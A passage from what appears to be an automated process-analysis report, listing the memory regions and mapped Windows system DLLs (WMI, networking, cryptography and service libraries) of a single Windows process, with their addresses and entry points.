"c:\\windows\\system32\\qmgr.dll") Region: id = 1334 start_va = 0x7fef2890000 end_va = 0x7fef2b09fff monitored = 0 entry_point = 0x7fef28c2200 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 1335 start_va = 0x7fef4120000 end_va = 0x7fef413bfff monitored = 0 entry_point = 0x7fef41211a0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1336 start_va = 0x7fef4140000 end_va = 0x7fef41a1fff monitored = 0 entry_point = 0x7fef4141198 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1337 start_va = 0x7fef41b0000 end_va = 0x7fef41e9fff monitored = 0 entry_point = 0x7fef41b1010 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 1338 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1339 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1340 start_va = 0x7fef4e30000 end_va = 0x7fef4ea0fff monitored = 0 entry_point = 0x7fef4e751d0 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1341 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1342 start_va = 0x7fef4ed0000 end_va = 0x7fef4f84fff monitored = 0 entry_point = 0x7fef4f4cf80 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1343 start_va = 0x7fef4f90000 end_va = 0x7fef4f97fff monitored = 0 entry_point = 0x7fef4f91414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1344 start_va = 0x7fef4fa0000 end_va = 0x7fef4ff9fff monitored = 0 entry_point = 0x7fef4fddde0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1345 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1346 start_va = 0x7fef5030000 end_va = 0x7fef509afff monitored = 0 entry_point = 0x7fef5074344 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1347 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1348 start_va = 0x7fef50c0000 end_va = 0x7fef5121fff monitored = 0 entry_point = 0x7fef50fbd80 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1349 start_va = 0x7fef5130000 end_va = 0x7fef525bfff monitored = 0 entry_point = 0x7fef51e0ef0 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1350 start_va = 0x7fef5260000 end_va = 0x7fef5279fff monitored = 0 entry_point = 0x7fef5273fbc region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 1351 start_va = 0x7fef5280000 end_va = 0x7fef5303fff monitored = 0 entry_point = 0x7fef52d1118 region_type = mapped_file name = "netcfgx.dll" filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll") Region: id = 1352 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1353 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1354 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1355 start_va = 0x7fef5470000 end_va = 0x7fef5488fff monitored = 0 entry_point = 0x7fef5471104 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 1356 start_va = 0x7fef5490000 end_va = 0x7fef54dffff monitored = 0 entry_point = 0x7fef5491190 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 1357 start_va = 0x7fef54e0000 end_va = 0x7fef54e7fff monitored = 0 entry_point = 0x7fef54e1020 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 1358 start_va = 0x7fef54f0000 end_va = 0x7fef5514fff monitored = 0 entry_point = 0x7fef5508c54 region_type = mapped_file name = "browser.dll" filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll") Region: id = 1359 start_va = 0x7fef5520000 end_va = 0x7fef555cfff monitored = 0 entry_point = 0x7fef5521070 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 1360 start_va = 0x7fef5560000 end_va = 0x7fef55a6fff monitored = 0 entry_point = 0x7fef5561040 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 1361 start_va = 0x7fef55b0000 end_va = 0x7fef55f1fff monitored = 0 entry_point = 0x7fef55b17e4 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 1362 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1363 start_va = 0x7fef5620000 end_va = 0x7fef56b1fff monitored = 0 entry_point = 0x7fef56951ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 1364 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1365 start_va = 0x7fef5740000 end_va = 0x7fef5779fff monitored = 0 entry_point = 0x7fef575d020 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 1366 start_va = 0x7fef5960000 end_va = 0x7fef5970fff monitored = 0 entry_point = 0x7fef5969e7c region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 1367 start_va = 0x7fef5a10000 end_va = 0x7fef5a73fff monitored = 0 entry_point = 0x7fef5a11254 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1368 start_va = 0x7fef5a80000 end_va = 0x7fef5af0fff monitored = 0 entry_point = 0x7fef5a81010 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1369 start_va = 0x7fef5b90000 end_va = 0x7fef5ba6fff monitored = 0 entry_point = 0x7fef5b91060 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1370 start_va = 0x7fef5bb0000 end_va = 0x7fef5d5ffff monitored = 0 entry_point = 0x7fef5bb1010 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1371 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1372 start_va = 0x7fef7f60000 end_va = 0x7fef7f7afff monitored = 0 entry_point = 0x7fef7f61198 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1373 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1374 start_va = 0x7fef8d20000 end_va = 0x7fef8d96fff monitored = 0 entry_point = 0x7fef8d2afd0 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 1375 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1376 start_va = 0x7fef8ee0000 end_va = 0x7fef8ee9fff monitored = 0 entry_point = 0x7fef8ee260c region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 1377 start_va = 0x7fef8ef0000 end_va = 0x7fef9001fff monitored = 0 entry_point = 0x7fef8f0f354 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 1378 start_va = 0x7fef9010000 end_va = 0x7fef901efff monitored = 0 entry_point = 0x7fef9017e80 region_type = mapped_file name = "wiarpc.dll" filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll") Region: id = 1379 start_va = 0x7fef9020000 end_va = 0x7fef9028fff monitored = 0 entry_point = 0x7fef9023668 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 1380 start_va = 0x7fef9030000 end_va = 0x7fef9038fff monitored = 0 entry_point = 0x7fef9031020 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 1381 start_va = 0x7fef9040000 end_va = 0x7fef9095fff monitored = 0 entry_point = 0x7fef9041040 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 1382 start_va = 0x7fef90a0000 end_va = 0x7fef90fdfff monitored = 0 entry_point = 0x7fef90a9024 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 1383 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1384 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1385 start_va = 0x7fef9150000 end_va = 0x7fef91a2fff monitored = 0 entry_point = 0x7fef9152b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1386 start_va = 0x7fef98b0000 end_va = 0x7fef98f1fff monitored = 0 entry_point = 0x7fef98e0048 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1387 start_va = 0x7fef9900000 end_va = 0x7fef9919fff monitored = 0 entry_point = 0x7fef9911ae4 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 1388 start_va = 0x7fef9940000 end_va = 0x7fef994efff monitored = 0 entry_point = 0x7fef9946894 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 1389 start_va = 0x7fefb210000 end_va = 0x7fefb223fff monitored = 0 entry_point = 0x7fefb213e64 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 1390 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1391 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1392 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1393 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 1394 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1395 start_va = 0x7fefb310000 end_va = 0x7fefb31ffff monitored = 0 entry_point = 0x7fefb31835c region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 1396 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1397 start_va = 0x7fefb340000 end_va = 0x7fefb376fff monitored = 0 entry_point = 0x7fefb348424 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1398 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1399 start_va = 0x7fefb3e0000 end_va = 0x7fefb4a1fff monitored = 0 entry_point = 0x7fefb3e101c region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1400 start_va = 0x7fefb6c0000 end_va = 0x7fefb6d6fff monitored = 0 entry_point = 0x7fefb6c9d50 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1401 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1402 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1403 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1404 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1405 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1406 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1407 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1408 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1409 start_va = 0x7fefc200000 end_va = 0x7fefc21cfff monitored = 0 entry_point = 0x7fefc201ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1410 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1411 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1412 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1413 start_va = 0x7fefc920000 end_va = 0x7fefc9dafff monitored = 0 entry_point = 0x7fefc926de0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1414 start_va = 0x7fefc9e0000 end_va = 0x7fefc9e6fff monitored = 0 entry_point = 0x7fefc9e14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1415 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1416 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1417 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1418 start_va = 0x7fefcb30000 end_va = 0x7fefcb4efff monitored = 0 entry_point = 0x7fefcb35c68 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 1419 start_va = 0x7fefcc00000 end_va = 0x7fefcc38fff monitored = 0 entry_point = 0x7fefcc0c0f0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 1420 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1421 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 1422 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1423 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1424 start_va = 0x7fefce60000 end_va = 0x7fefcebafff monitored = 0 entry_point = 0x7fefce66940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1425 start_va = 0x7fefcfd0000 end_va = 0x7fefcfd6fff monitored = 0 entry_point = 0x7fefcfd142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1426 start_va = 0x7fefcfe0000 end_va = 0x7fefd034fff monitored = 0 entry_point = 0x7fefcfe1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1427 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1428 start_va = 0x7fefd150000 end_va = 0x7fefd181fff monitored = 0 entry_point = 0x7fefd15144c region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 1429 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1430 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1431 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1432 start_va = 0x7fefd2c0000 end_va = 0x7fefd2d3fff monitored = 0 entry_point = 0x7fefd2c4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1433 start_va = 0x7fefd520000 end_va = 0x7fefd527fff monitored = 0 entry_point = 0x7fefd522a6c region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1434 start_va = 0x7fefd530000 end_va = 0x7fefd539fff monitored = 0 entry_point = 0x7fefd533b40 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1435 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1436 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1437 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1438 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1439 start_va = 0x7fefd650000 end_va = 0x7fefd6e0fff monitored = 0 entry_point = 0x7fefd651440 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1440 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1441 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1442 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1443 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1444 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1445 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 